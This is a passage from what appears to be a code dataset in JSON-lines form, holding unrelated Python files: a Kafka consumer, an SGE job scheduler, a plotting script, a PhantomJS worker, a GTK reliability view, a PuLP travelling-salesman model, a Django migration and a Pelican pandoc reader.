:class:`pykafka.protocol.FetchPartitionRequest` for this\n partition.\n\n :param max_bytes: The number of bytes of messages to\n attempt to fetch\n :type max_bytes: int\n \"\"\"\n return PartitionFetchRequest(\n self.partition.topic.name, self.partition.id,\n self.next_offset, max_bytes)\n\n def build_offset_commit_request(self):\n \"\"\"Create a :class:`pykafka.protocol.PartitionOffsetCommitRequest`\n for this partition\n \"\"\"\n return PartitionOffsetCommitRequest(\n self.partition.topic.name,\n self.partition.id,\n self.last_offset_consumed,\n int(time.time() * 1000),\n 'pykafka'\n )\n\n def build_offset_fetch_request(self):\n \"\"\"Create a PartitionOffsetFetchRequest for this partition\n \"\"\"\n return PartitionOffsetFetchRequest(\n self.partition.topic.name,\n self.partition.id\n )\n\n def consume(self):\n \"\"\"Get a single message from this partition\"\"\"\n try:\n message = self._messages.get_nowait()\n self.last_offset_consumed = message.offset\n return message\n except Empty:\n return None\n\n def enqueue_messages(self, messages):\n \"\"\"Put a set of messages into the internal message queue\n\n :param messages: The messages to enqueue\n :type messages: Iterable of :class:`pykafka.common.Message`\n \"\"\"\n for message in messages:\n if message.offset < self.last_offset_consumed:\n log.debug(\"Skipping enqueue for offset (%s) \"\n \"less than last_offset_consumed (%s)\",\n message.offset, self.last_offset_consumed)\n continue\n self._messages.put(message)\n self.next_offset = message.offset + 1\n\n if self._messages_arrived is not None:\n self._messages_arrived.release()\n","sub_path":"pykafka/simpleconsumer.py","file_name":"simpleconsumer.py","file_ext":"py","file_size_in_byte":26778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"418683368","text":"\"\"\"Implementation of the scheduling system for SGE scheduler at UND.\n\nThis module implements the Scheduler and ClusterJob classes.\n\"\"\"\nimport errno\nimport getpass\nimport logging\nimport subprocess\nimport tempfile\nimport xml.etree.ElementTree as ET\n\nfrom flow.errors import SubmitError\nfrom flow.scheduling.base import ClusterJob, JobStatus, Scheduler\n\nlogger = logging.getLogger(__name__)\n\n\ndef _fetch(user=None):\n \"\"\"Fetch the cluster job status information from the SGE scheduler.\"\"\"\n\n def parse_status(s):\n s = s.strip()\n if s == \"qw\":\n return JobStatus.queued\n elif s == \"r\":\n return JobStatus.active\n elif s in [\"Eqw\"]:\n return JobStatus.error\n return JobStatus.registered\n\n if user is None:\n user = getpass.getuser()\n\n cmd = [\"qstat\", \"-u\", user, \"-xml\"]\n try:\n result = subprocess.check_output(cmd).decode(\n \"utf-8\", errors=\"backslashreplace\"\n )\n except subprocess.CalledProcessError:\n raise\n except IOError as error:\n if error.errno != errno.ENOENT:\n raise\n else:\n raise RuntimeError(\"SGE not available.\")\n root = ET.fromstring(result)\n jobs = root.find(\"queue_info\")\n for job in jobs:\n status = job.find(\"state\").text\n name = job.find(\"JB_name\").text\n yield SGEJob(name, parse_status(status))\n jobs = root.find(\"job_info\")\n for job in jobs:\n status = job.find(\"state\").text\n name = job.find(\"JB_name\").text\n yield SGEJob(name, parse_status(status))\n\n\nclass SGEJob(ClusterJob):\n \"\"\"A SGEJob is a ClusterJob managed by a SGE scheduler.\"\"\"\n\n pass\n\n\nclass SGEScheduler(Scheduler):\n \"\"\"Implementation of the abstract Scheduler class for SGE schedulers.\n\n This class allows us to submit cluster jobs to a SGE scheduler and query\n their current status.\n\n :param user:\n Limit the status information to cluster jobs submitted by user.\n :type user:\n str\n \"\"\"\n\n # The standard command used to submit jobs to the SLURM scheduler.\n submit_cmd = [\"qsub\"]\n\n def __init__(self, user=None, **kwargs):\n super(SGEScheduler, self).__init__(**kwargs)\n self.user = user\n\n def jobs(self):\n \"\"\"Yield cluster jobs by querying the scheduler.\"\"\"\n self._prevent_dos()\n for job in _fetch(user=self.user):\n yield job\n\n def submit(\n self,\n script,\n after=None,\n hold=False,\n pretend=False,\n flags=None,\n **kwargs\n ):\n \"\"\"Submit a job script for execution to the scheduler.\n\n :param script:\n The job script submitted for execution.\n :type script:\n str\n :param after:\n Execute the submitted script after a job with this id has completed.\n :type after:\n str\n :param pretend:\n If True, do not actually submit the script, but only simulate the submission.\n Can be used to test whether the submission would be successful.\n Please note: A successful \"pretend\" submission is not guaranteed to succeed.\n :type pretend:\n bool\n :param flags:\n Additional arguments to pass through to the scheduler submission command.\n :type flags:\n list\n :returns:\n Returns True if the cluster job was successfully submitted, otherwise None.\n \"\"\"\n if flags is None:\n flags = []\n elif isinstance(flags, str):\n flags = flags.split()\n\n submit_cmd = self.submit_cmd + flags\n\n if after is not None:\n submit_cmd.extend([\"-hold_jid\", \"\".format(after.split(\".\")[0])])\n\n if pretend:\n print(\"# Submit command: {}\".format(\" \".join(submit_cmd)))\n print(script)\n print()\n else:\n with tempfile.NamedTemporaryFile() as tmp_submit_script:\n tmp_submit_script.write(str(script).encode(\"utf-8\"))\n tmp_submit_script.flush()\n try:\n subprocess.check_output(\n submit_cmd + [tmp_submit_script.name],\n universal_newlines=True,\n )\n except subprocess.CalledProcessError as e:\n raise SubmitError(\"SGE error: {}\".format(e.output))\n\n return True\n\n @classmethod\n def is_present(cls):\n \"\"\"Return True if it appears that a SGE scheduler is available within the environment.\"\"\"\n try:\n subprocess.check_output(\n [\"sge_qmaster\", \"-help\"], stderr=subprocess.STDOUT\n )\n except (IOError, OSError):\n return False\n else:\n return True\n","sub_path":"reproducibility_project/templates/ndcrc_scheduler.py","file_name":"ndcrc_scheduler.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"386450378","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nqs = [2, 3, 4, 5]\nls = [20, 25, 30, 35, 40]\nzs = []\n# number of circuit iterations, sample size\nN = 5\n\n# plot avg entropy as a function of iteration\nents_2d = []\n\n\nfor q in qs:\n temp_ents = []\n for L in ls:\n for i in range(N):\n filename = 'o' + str(L) + 'x10_q' + str(q) + '_e-13.txt'\n\n with open(filename) as f:\n # get the length of the MPS (one side of circuit)\n line = f.readline()\n n = int(line[4:])\n # get the number of iterations (other side of circuit)\n m = int(f.readline()[4:])\n q = int(f.readline()[4:])\n for i in range(m):\n while 'iteration' not in line and line != '':\n line = f.readline()\n f.readline() # this says \"entropies\"\n line = f.readline() # this is the data\n ents = line.split(',')[:-1]\n ents = [float(e) for e in ents]\n # print(ents)\n if len(ents) > 0:\n avg_ents.append(np.average(ents))\n middle_ents.append(ents[n // 2])\n before_mid_ents.append(ents[(n // 2) - 1])\n after_mid_ents.append(ents[(n // 2) + 1])\n\n all_ents = [[middle_ents[i], after_mid_ents[i]] for i in range(len(middle_ents))]\n temp_ents.append(np.average(middle_ents[4:]))\n print(temp_ents)\n ents_2d.append(temp_ents)\nprint(ents_2d)\n\nfor i in range(len(qs)):\n plt.plot(ls, ents_2d[i], label=str(qs[i]))\n\nplt.legend()\nplt.show()\n","sub_path":"analyze_dist.py","file_name":"analyze_dist.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"295377624","text":"'''\nWorkerThread to run the external Program and capture the output.\n\n@author: Max Maass\n'''\nimport threading\nfrom subprocess import Popen, PIPE\nfrom sys import stderr\n\nclass Thread(threading.Thread):\n def __init__(self,pjs_path, ndjs_path, gen, ow, stat):\n \"\"\"Initialize Thread with the provided parameters\"\"\"\n threading.Thread.__init__(self)\n self.PHANTOMJS_PATH = pjs_path\n self.NETDOMAINS_PATH = ndjs_path\n self.GENERATOR = gen\n self.OUTWRITER = ow\n self.ERRWRITER = stderr\n self.STAT = stat\n self.RUN = True\n \n \n def run(self):\n \"\"\"run\n\n Main loop of the thread. Checks URLs using PhantomJS and saves the output.\n \"\"\"\n try:\n for self.url in self.GENERATOR: # Iterate through all URLs in the Generator\n if self.RUN: # If we are still active...\n try:\n self.output = self.runExternal(self.url) # We run the external program and capture the output\n self.OUTWRITER.writeOut(self.url, self.output[0].strip()) # Then write it to file\n if len(self.output[1]) != 0: # Something must have gone wrong. Notify\n self.ERRWRITER.write(\"ERROR: \" + self.url + \": \" + self.output[1].strip())\n self.STAT.done() # Notify progress bar\n except Exception as inst:\n self.ERRWRITER.write(type(inst))\n self.ERRWRITER.write(str(inst))\n else:\n return\n except:\n return\n \n def runExternal(self,url):\n \"\"\"runExternal\n\n Run PhantomJS on the provided URL.\n\n @param url: The URL phantomjs should check.\n \"\"\"\n self.process = Popen([self.PHANTOMJS_PATH, self.NETDOMAINS_PATH, \"http://\" + url], stdout=PIPE, stderr=PIPE)\n return self.process.communicate()\n \n def shutdown(self):\n \"\"\"shutdown\n\n Cleanly shut down the thread.\n \"\"\"\n self.RUN = False","sub_path":"src/Worker/WorkerThread.py","file_name":"WorkerThread.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"613676668","text":"with open(\"data.txt\", \"r\") as fa:\n stra = fa.read()\n\nlista = stra.splitlines()\ncol_c = []\n\nfor line in lista:\n temp = line.split()\n col_c.append(temp[2])\n\nprint(col_c)\n","sub_path":"day4/files/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"269424671","text":"# -*- coding: utf-8 -*-\n#\n# ramstk.gui.gtk.workviews.components.Meter.py is part of the RAMSTK\n# Project\n#\n# All rights reserved.\n# Copyright 2007 - 2017 Doyle Rowland doyle.rowland <AT> reliaqual <DOT> com\n\"\"\"Meter Work View.\"\"\"\n\nfrom pubsub import pub\n\n# Import other RAMSTK modules.\nfrom ramstk.gui.gtk import ramstk\nfrom ramstk.gui.gtk.ramstk.Widget import _\nfrom ramstk.gui.gtk.workviews.components.Component import (AssessmentInputs,\n AssessmentResults)\n\n\nclass MeterAssessmentInputs(AssessmentInputs):\n \"\"\"\n Display Meter assessment input attribute data in the RAMSTK Work Book.\n\n The Meter assessment input view displays all the assessment inputs for\n the selected Meter item. This includes, currently, inputs for\n MIL-HDBK-217FN2. The attributes of a Meter assessment input view are:\n\n :cvar dict _dic_quality: dictionary of meter quality levels. Key is\n meter subcategory ID; values are lists of\n quality levels.\n :cvar dict _dic_type: dictionary of meter types. Key is meter\n subcategory ID; values are lists of types.\n :cvar dict _dic_specification: dictionary of meter MIL-SPECs. Key is\n meter tye ID; values are lists\n of specifications.\n :cvar dict _dic_insert: dictionary of meter insert materials. First\n key is meter type ID, second key is meter\n specification ID; values are lists of insert\n materials.\n\n :ivar cmbApplication: select and display the application of the meter.\n :ivar cmbType: select and display the type of meter.\n\n Callbacks signals in _lst_handler_id:\n\n +-------+-------------------------------------------+\n | Index | Widget - Signal |\n +=======+===========================================+\n | 0 | cmbQuality - `changed` |\n +-------+-------------------------------------------+\n | 1 | cmbApplication - `changed` |\n +-------+-------------------------------------------+\n | 2 | cmbType - `changed` |\n +-------+-------------------------------------------+\n \"\"\"\n\n # Define private dict attributes.\n # Quality levels; key is the subcategory ID.\n _dic_quality = {\n 2: [[\"MIL-SPEC\"], [_(u\"Lower\")]],\n 1: [[\"MIL-SPEC\"], [_(u\"Lower\")]],\n }\n # Meter types; key is the subcategory ID.\n _dic_types = {\n 1: [[_(u\"AC\")], [_(u\"Inverter Driver\")], [_(u\"Commutator DC\")]],\n 2: [[_(u\"Direct Current\")], [_(u\"Alternating Current\")]]\n }\n\n def __init__(self, controller, **kwargs):\n \"\"\"\n Initialize an instance of the Meter assessment input view.\n\n :param controller: the meter data controller instance.\n :type controller: :class:`ramstk.meter.Controller.MeterBoMDataController`\n :param int hardware_id: the hardware ID of the currently selected meter.\n :param int subcategory_id: the ID of the meter subcategory.\n \"\"\"\n AssessmentInputs.__init__(self, controller, **kwargs)\n\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n self._lst_labels.append(_(u\"Meter Type:\"))\n self._lst_labels.append(_(u\"Meter Function:\"))\n\n # Initialize private scalar attributes.\n\n # Initialize public dictionary attributes.\n\n # Initialize public list attributes.\n\n # Initialize public scalar attributes.\n self.cmbApplication = ramstk.RAMSTKComboBox(\n index=0,\n simple=True,\n tooltip=_(u\"The appliction of the panel meter.\"))\n self.cmbType = ramstk.RAMSTKComboBox(\n index=0, simple=False, tooltip=_(u\"The type of meter.\"))\n\n self._make_page()\n self.show_all()\n\n self._lst_handler_id.append(\n self.cmbQuality.connect('changed', self._on_combo_changed, 0))\n self._lst_handler_id.append(\n self.cmbApplication.connect('changed', self._on_combo_changed, 1))\n self._lst_handler_id.append(\n self.cmbType.connect('changed', self._on_combo_changed, 2))\n\n def _do_load_comboboxes(self, **kwargs):\n \"\"\"\n Load the meter RKTComboBox()s.\n\n This method is used to load the specification RAMSTKComboBox() whenever\n the meter subcategory is changed.\n\n :param int subcategory_id: the newly selected meter subcategory ID.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _subcategory_id = kwargs['subcategory_id']\n _return = False\n\n _attributes = AssessmentInputs.do_load_comboboxes(\n self, subcategory_id=_subcategory_id)\n\n # Load the quality level RAMSTKComboBox().\n if _attributes['hazard_rate_method_id'] == 1:\n _data = [[\"MIL-SPEC\"], [_(u\"Lower\")]]\n else:\n try:\n _data = self._dic_quality[self._subcategory_id]\n except KeyError:\n _data = []\n self.cmbQuality.do_load_combo(_data)\n\n # Load the meter appliction RAMSTKComboBox().\n self.cmbApplication.do_load_combo([[_(u\"Ammeter\")], [_(u\"Voltmeter\")],\n [_(u\"Other\")]])\n\n # Load the meter type RAMSTKComboBox().\n try:\n _data = self._dic_types[self._subcategory_id]\n except KeyError:\n _data = []\n self.cmbType.do_load_combo(_data)\n\n return _return\n\n def _do_load_page(self, **kwargs):\n \"\"\"\n Load the Meter assesment input widgets.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n _attributes = AssessmentInputs.do_load_page(self, **kwargs)\n\n self.cmbApplication.handler_block(self._lst_handler_id[1])\n self.cmbApplication.set_active(_attributes['application_id'])\n self.cmbApplication.handler_unblock(self._lst_handler_id[1])\n\n self.cmbType.handler_block(self._lst_handler_id[2])\n self.cmbType.set_active(_attributes['type_id'])\n self.cmbType.handler_unblock(self._lst_handler_id[2])\n\n return _return\n\n def _do_set_sensitive(self, **kwargs): # pylint: disable=unused-argument\n \"\"\"\n Set widget sensitivity as needed for the selected meter.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n _attributes = self._dtc_data_controller.request_get_attributes(\n self._hardware_id)\n\n self.cmbType.set_sensitive(True)\n self.cmbApplication.set_sensitive(False)\n\n if (_attributes['hazard_rate_method_id'] == 2\n and _attributes['subcategory_id'] == 2):\n self.cmbApplication.set_sensitive(True)\n\n return _return\n\n def _make_page(self):\n \"\"\"\n Make the Meter class gtk.Notebook() assessment input page.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._do_load_comboboxes(subcategory_id=self._subcategory_id)\n self._do_set_sensitive()\n\n # Build the container for inductors.\n _x_pos, _y_pos = AssessmentInputs.make_page(self)\n\n self.put(self.cmbType, _x_pos, _y_pos[1])\n self.put(self.cmbApplication, _x_pos, _y_pos[2])\n\n return None\n\n def _on_combo_changed(self, combo, index):\n \"\"\"\n Retrieve RAMSTKCombo() changes and assign to Meter attribute.\n\n This method is called by:\n\n * gtk.Combo() 'changed' signal\n\n :param combo: the RAMSTKCombo() that called this method.\n :type combo: :class:`ramstk.gui.gtk.ramstk.RAMSTKCombo`\n :param int index: the position in the signal handler list associated\n with the calling RAMSTKComboBox(). Indices are:\n\n +-------+------------------+-------+------------------+\n | Index | Widget | Index | Widget |\n +=======+==================+=======+==================+\n | 1 | cmbApplication | 2 | cmbType |\n +-------+------------------+-------+------------------+\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n combo.handler_block(self._lst_handler_id[index])\n\n _attributes = AssessmentInputs.on_combo_changed(self, combo, index)\n\n if _attributes:\n if index == 1:\n _attributes['application_id'] = int(combo.get_active())\n elif index == 2:\n _attributes['type_id'] = int(combo.get_active())\n\n self._dtc_data_controller.request_set_attributes(\n self._hardware_id, _attributes)\n\n combo.handler_unblock(self._lst_handler_id[index])\n\n return _return\n\n def on_select(self, module_id, **kwargs):\n \"\"\"\n Load the meter assessment input work view widgets.\n\n :param int module_id: the Meter ID of the selected/edited\n meter.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._hardware_id = module_id\n\n self._do_set_sensitive(**kwargs)\n\n return self._do_load_page(**kwargs)\n\n\nclass MeterAssessmentResults(AssessmentResults):\n \"\"\"\n Display Meter assessment results attribute data in the RAMSTK Work Book.\n\n The Meter assessment result view displays all the assessment results\n for the selected meter. This includes, currently, results for\n MIL-HDBK-217FN2 parts count and MIL-HDBK-217FN2 part stress methods. The\n attributes of a meter assessment result view are:\n\n :ivar txtPiA: displays the application factor for the panel meter.\n :ivar txtPiF: displays the function factor for the panel meter.\n :ivar txtPiT: displays the temperature stress factor for the elapsed time\n meter.\n \"\"\"\n\n # Define private dict attributes.\n _dic_part_stress = {\n 2:\n u\"<span foreground=\\\"blue\\\">\\u03BB<sub>p</sub> = \\u03BB<sub>b</sub>\\u03C0<sub>A</sub>\\u03C0<sub>F</sub>\\u03C0<sub>Q</sub>\\u03C0<sub>E</sub></span>\",\n 1:\n u\"<span foreground=\\\"blue\\\">\\u03BB<sub>p</sub> = \\u03BB<sub>b</sub>\\u03C0<sub>T</sub>\\u03C0<sub>E</sub></span>\"\n }\n\n def __init__(self, controller, **kwargs):\n \"\"\"\n Initialize an instance of the Meter assessment result view.\n\n :param controller: the meter data controller instance.\n :type controller: :class:`ramstk.meter.Controller.MeterBoMDataController`\n \"\"\"\n AssessmentResults.__init__(self, controller, **kwargs)\n\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n self._lst_labels.append(u\"\\u03C0<sub>A</sub>:\")\n self._lst_labels.append(u\"\\u03C0<sub>F</sub>:\")\n self._lst_labels.append(u\"\\u03C0<sub>T</sub>:\")\n\n # Initialize private scalar attributes.\n self._lblModel.set_tooltip_markup(\n _(u\"The assessment model used to calculate the meter failure \"\n u\"rate.\"))\n\n # Initialize public dictionary attributes.\n\n # Initialize public list attributes.\n\n # Initialize public scalar attributes.\n self.txtPiA = ramstk.RAMSTKEntry(\n width=125,\n editable=False,\n bold=True,\n tooltip=_(u\"The application factor for the meter.\"))\n self.txtPiF = ramstk.RAMSTKEntry(\n width=125,\n editable=False,\n bold=True,\n tooltip=_(u\"The function factor for the meter.\"))\n self.txtPiT = ramstk.RAMSTKEntry(\n width=125,\n editable=False,\n bold=True,\n tooltip=_(u\"The temperature stress factor for the meter.\"))\n\n self._make_page()\n self.show_all()\n\n pub.subscribe(self._do_load_page, 'calculatedHardware')\n\n def _do_load_page(self, **kwargs):\n \"\"\"\n Load the meter assessment results page.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n _attributes = AssessmentResults.do_load_page(self, **kwargs)\n\n self.txtPiA.set_text(str(self.fmt.format(_attributes['piA'])))\n self.txtPiF.set_text(str(self.fmt.format(_attributes['piF'])))\n self.txtPiT.set_text(str(self.fmt.format(_attributes['piT'])))\n\n return _return\n\n def _do_set_sensitive(self, **kwargs):\n \"\"\"\n Set widget sensitivity as needed for the selected meter.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n AssessmentResults.do_set_sensitive(self, *kwargs)\n _attributes = self._dtc_data_controller.request_get_attributes(\n self._hardware_id)\n\n self.txtPiA.set_sensitive(False)\n self.txtPiF.set_sensitive(False)\n self.txtPiT.set_sensitive(False)\n\n if _attributes['hazard_rate_method_id'] == 2:\n self.txtPiE.set_sensitive(True)\n if self._subcategory_id == 2:\n self.txtPiA.set_sensitive(True)\n self.txtPiF.set_sensitive(True)\n elif self._subcategory_id == 1:\n self.txtPiT.set_sensitive(True)\n self.txtPiQ.set_sensitive(False)\n\n return _return\n\n def _make_page(self):\n \"\"\"\n Make the meter gtk.Notebook() assessment results page.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._do_set_sensitive()\n\n # Build the container for capacitors.\n _x_pos, _y_pos = AssessmentResults.make_page(self)\n\n self.put(self.txtPiA, _x_pos, _y_pos[3])\n self.put(self.txtPiF, _x_pos, _y_pos[4])\n self.put(self.txtPiT, _x_pos, _y_pos[5])\n\n return None\n\n def on_select(self, module_id, **kwargs):\n \"\"\"\n Load the meter assessment input work view widgets.\n\n :param int module_id: the Meter ID of the selected/edited\n meter.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._hardware_id = module_id\n\n self._do_set_sensitive(**kwargs)\n\n return self._do_load_page(**kwargs)\n","sub_path":"src/ramstk/gui/gtk/workviews/components/Meter.py","file_name":"Meter.py","file_ext":"py","file_size_in_byte":14683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"501173587","text":"#!/usr/bin/env python\n\n# Use generators to avoid crashed in memory when needed to interate on large set of data\n\n# Generators can be built with the syntax of list comprehensions but inside ()\nnames = ['Tim', 'Mark', 'Donna', 'Albert', 'Sara']\ngen_a = (len(n) for n in names)\n\nprint(next(gen_a))\nprint(next(gen_a))\n\n\n# You define a generator function, using the yield keyword to return a value\ndef my_generator():\n names = ['Gianluca', 'Lisa', 'Sofia', 'Giulia']\n for i in names:\n yield i\n\n\n# You define a generator iterator as an instance of the function\ngen = my_generator()\n\n# You call next to generate the next value\nprint(next(gen))\nprint(next(gen))\n\n# Being the generator an iterator you can use it in a for loop as well\n# notes that we keep generating from where we left\nfor val in gen:\n print(val)\n\n# Remember: generators are used to generate the next value,\n# they allow you to iterate over values without having to load them\n# in memory. That's a key difference from a function where you\n# only get a chance to return all results all at the same time.\n# For example:\n# 1. when you read a file the built in mechanism is a generator\n# 2. the xrange uses a generator\n\n# yield: what it does is save the \"state\" of a generator function\n","sub_path":"samples/generators/demo_generators.py","file_name":"demo_generators.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"122004384","text":"from pulp import *\nimport numpy as np\nimport pandas as pd\n\ndf=pd.read_csv('problem1.csv')\n#df\n\n\nnvar=6*6\ncity=[1,2,3,4,5,6]\ndist=df.iloc[0:6,0:6].to_numpy()\nprint(dist)\ndist1 = df.to_numpy()\nprint(dist1)\ncost = dict(((a,b),dist[a-1][b-1]) for a in city for b in city if a!=b)\nprint(cost)\nmodel=LpProblem(\"lp\",LpMinimize)\nx = LpVariable.dicts('x',cost, 0,1,LpBinary)\nmodel+=lpSum([x[(i,j)]*cost[(i,j)] for (i,j) in cost])\n\nfor k in city:\n model+= lpSum([ x[(i,k)] for i in city if (i,k) in x]) ==1 ##i to j\n model+=lpSum([ x[(k,i)] for i in city if (k,i) in x]) ==1 ##j to i\n\nz = LpVariable.dicts('z', city, 0, len(city)-1, LpInteger)\nfor i in city:\n for j in city:\n if i != j and (i != 1 and j!= 1) and (i,j) in x:\n model += z[i] - z[j] <= (6)*(1-x[(i,j)]) - 1\nmodel\n\nstatus=model.solve(PULP_CBC_CMD(msg=0))\n\nprint(f\"status: {model.status},{LpStatus[model.status]}\")\nprint(f\"Objective= {model.objective.value()}\")\n\nfor var in x.values():\n print(\"{}={}\".format(var.name,var.value()))\n\nfor var in z.values():\n print(\"{}={}\".format(var.name,var.value()))\n\n\nstarting_city = 1\ns_route=[]##shortest route\ns_route.append(city.pop(0))\n\nwhile len(city) > 0:\n\n for k in city:\n if x[(starting_city,k)].varValue ==1:\n s_route.append( city.pop( city.index(k)))\n starting_city=k\n break\n\ns_route.append(1)\nprint(s_route)\nshortest_route_length = [cost[(s_route[i-1], s_route[i])] for i in range(1,len(s_route))]\n\nprint('Shortest Path Travelling by Mr.Iyer :')\nflag=True\nfor cty in s_route:\n if flag:\n print(cty,end='')\n flag = False\n else:\n print(f' -> {cty}',end='')\nprint(f\"\\nMinimum cost of the tour for mr.Iyer from his home city to travel other 5 \\\ncities with min cost and returning back to its home city :{sum(shortest_route_length)}\")","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"583509164","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('apellido', models.CharField(max_length=50)),\n ('direccion', models.CharField(max_length=150)),\n ('telefono', models.CharField(help_text=b'Ejemplo de telefono: 03492-412589', max_length=12)),\n ('celular', models.CharField(help_text=b'Ejemplo de celular: 03492-15896324', max_length=14)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Empleado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('apellido', models.CharField(max_length=50)),\n ('dni', models.CharField(max_length=8)),\n ('direccion', models.CharField(max_length=150)),\n ('telefono', models.CharField(help_text=b'Ejemplo de telefono: 03492-412589', max_length=12)),\n ('celular', models.CharField(help_text=b'Ejemplo de celular: 03492-15896324', max_length=14)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Evento',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateField()),\n ('cliente', models.ForeignKey(to='sitio.Cliente')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Historial',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('pago', models.IntegerField()),\n ('empleado', models.ForeignKey(to='sitio.Empleado')),\n ('evento', models.ForeignKey(to='sitio.Evento')),\n ],\n options={\n 'verbose_name_plural': 'Historiales',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Localidad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigopostal', models.IntegerField()),\n ('nombre', models.CharField(max_length=50)),\n ],\n options={\n 'verbose_name_plural': 'Localidades',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Presupuesto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateField(default=datetime.date(2015, 2, 11))),\n ('importe', models.IntegerField()),\n ('evento', models.OneToOneField(to='sitio.Evento')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Producto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('cantidad', models.IntegerField()),\n ('imagen', models.ImageField(null=True, upload_to=b'url', blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Salon',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.TextField(max_length=100)),\n ('direccion', models.CharField(max_length=100)),\n ('localidad', models.ForeignKey(to='sitio.Localidad')),\n ],\n options={\n 'verbose_name_plural': 'Salones',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='presupuesto',\n name='producto',\n field=models.ManyToManyField(to='sitio.Producto'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='evento',\n name='salon',\n field=models.ForeignKey(to='sitio.Salon'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='localidad',\n field=models.ForeignKey(to='sitio.Localidad'),\n preserve_default=True,\n ),\n ]\n","sub_path":"jcc/apps/sitio/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"190048141","text":"import subprocess\nfrom pelican import signals\nfrom pelican.readers import BaseReader\nfrom pelican.utils import pelican_open\nfrom yaml import load\ntry:\n from yaml import CLoader as Loader\nexcept ImportError:\n from yaml import Loader\n\nfrom datetime import datetime\n\nclass PandocReader(BaseReader):\n enabled = True\n file_extensions = ['md', 'markdown', 'mkd', 'mdown']\n\n def read(self, filename):\n with pelican_open(filename) as fp:\n text = tuple(fp.splitlines())\n\n metadata = {}\n init = text.index(\"...\")\n end = text[init:].index(\"---\") + init\n\n metatext = \"\\n\".join(text[init+1:end])\n metadata = load(metatext, Loader=Loader)\n\n if \"Date\" in metadata:\n # Back to string because PyYaml is way too clever\n metadata[\"Date\"] = metadata[\"Date\"].isoformat()\n\n finalmeta = {}\n for k,v in metadata.items():\n finalmeta[k.lower()] = self.process_metadata(k.lower(),v)\n\n content = \"\\n\".join(text[:init] + text[end+1:])\n\n extra_args = self.settings.get('PANDOC_ARGS', [])\n extensions = self.settings.get('PANDOC_EXTENSIONS', '')\n if isinstance(extensions, list):\n extensions = ''.join(extensions)\n\n pandoc_cmd = [\"pandoc\", \"--from=markdown\" + extensions, \"--to=html5\"]\n pandoc_cmd.extend(extra_args)\n\n proc = subprocess.Popen(pandoc_cmd,\n stdin = subprocess.PIPE,\n stdout = subprocess.PIPE)\n\n output = proc.communicate(content.encode('utf-8'))[0].decode('utf-8')\n status = 